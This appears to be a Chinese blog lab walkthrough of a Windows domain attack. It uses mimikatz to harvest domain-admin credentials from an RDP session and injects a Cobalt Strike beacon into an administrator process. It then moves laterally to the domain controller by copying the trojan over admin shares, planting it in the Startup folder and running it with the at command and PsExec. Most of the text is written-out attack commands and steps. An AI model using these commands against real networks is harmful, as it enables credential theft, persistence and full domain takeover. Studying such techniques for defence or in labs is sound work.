使用远程桌面进行操作
我们使用本地管理员去登录这个Windows7,然后开启远程桌面
我们可以添加一个域管理员用户,然后域管理员就可以远程登录了
然后我们开始运行mimikatz.exe
发现没有域管理员的密码和NTLM,只有我们当前登录的这个用户的密码和NTLM
然后我们在域控主机(也就是域管理员主机)(Windows2008)打开mstsc.exe,也就是远程桌面连接
然后输入我们在WIndows7上登录的用户的用户名或者Windows7的IP地址
然后输入域管理员的密码
连接上以后我们再去mimikatz上去查看,发现了域管理员的密码和NTLM
我们使用本地管理员的用户将木马运行起来
在CS上已经上线成功
上线之后我们可以打印它的进程列表(Process List)看看,没有出现域管理员Administrator的进程,列表里的User都是当前系统本地的账号或者后台服务等等
现在我们使用Windows2008进行远程登录WIndows7,让其下线,这个一旦登录成功,也会开启一些进程,点击是
上述操作就是切换用户的操作,没有将其注销,如果注销了的话木马就已经断了
现在Windows2008远程连接到了Windows7的远程桌面
然后我们在木马那里(CS)打印一下进程
我们发现有Administrator(域管理员)开启的进程
我们选择rdpclip.exe(远程桌面)这个进程进行注入,点击inject,(其实只要是由Administrator开启的进程都可以)
这时候会给我们弹一个监听器,让我们选择使用哪个,我们选择HTTP_Beacon
意思就是在Windows7这台主机上,以域管理员权限开启一个新的木马,然后把这个木马注入到我们所选择的进程当中
然后我们发现上线成功,并且上线的用户是域管理员
我们先打开本地管理员的Beacon命令行(interact),执行如下命令
shell dir \\dcadmin\admin$
发现登录失败,无法访问域控的管理目录
但我们使用Administrator的Beacon,我们执行和上面一样的命令
接下来我们将Windows7上的木马程序复制到我们的域控主机上
复制成功
如果使用如下命令的话,本质还是在我们Windows7上的命令行去访问这个程序,这个命令最终还是在WIndows7上执行,但我们想要在Windows2008上执行,所以这种命令不对,不符合我们的要求
shell \\dcadmin\c$\Tools\http_beacon_64.exe
接下来就有一个问题,我们如何让木马程序在Windows2008上运行
第一个就是PsExec,我们可以使用如下这条命令,将Windows2008的命令行返回给我们的WIndows7,然后运行木马程序即可
PsExec.exe \\192.168.112.100 cmd.exe第二个就是尝试往域控的自启动目录中写入木马文件,拿下域控
copy C:\http_beacon.exe "\\dcadmin\c$\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
复制成功
我们去域控主机目录里看看木马是否写进去
然后我们重新启动域控主机(WIndows2008 R2)
看到域控主机上线成功
我们将之前dump出来的Hash删除
现在我们用域控主机来dunp Hash
然后开始横向移动
将所有需要填的参数加进去,最后点击launch
上线成功
上线的过程就是把木马复制到\\GOD-111\ADMINS目录下,随机生成一个木马的名称
然后执行这个木马即可
我们也可以使用at命令将木马执行
我们先把木马复制到域控主机那里
然后使用at命令进行执行
shell at \\dcadmin 16:04 cmd.exe /c "C:\Tools\http_beacon_64.exe"
发现没有报错,说明没有问题,接下来我们就等着域控主机上线
上线成功
我们继续换不同的方式让域控主机上线
先把这个工具(PsExec.exe)上传到Windows7上去
我们在CS中进行操作,先将木马程序复制到Windows2008 R2上去,然后执行下面的命令
shell C:\Tools\PSTools\psexec.exe /accepteula /s \\dcadmin cmd.exe /c "C:Tools\http_beacon_64.exe"上线成功
扫一扫
1016
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
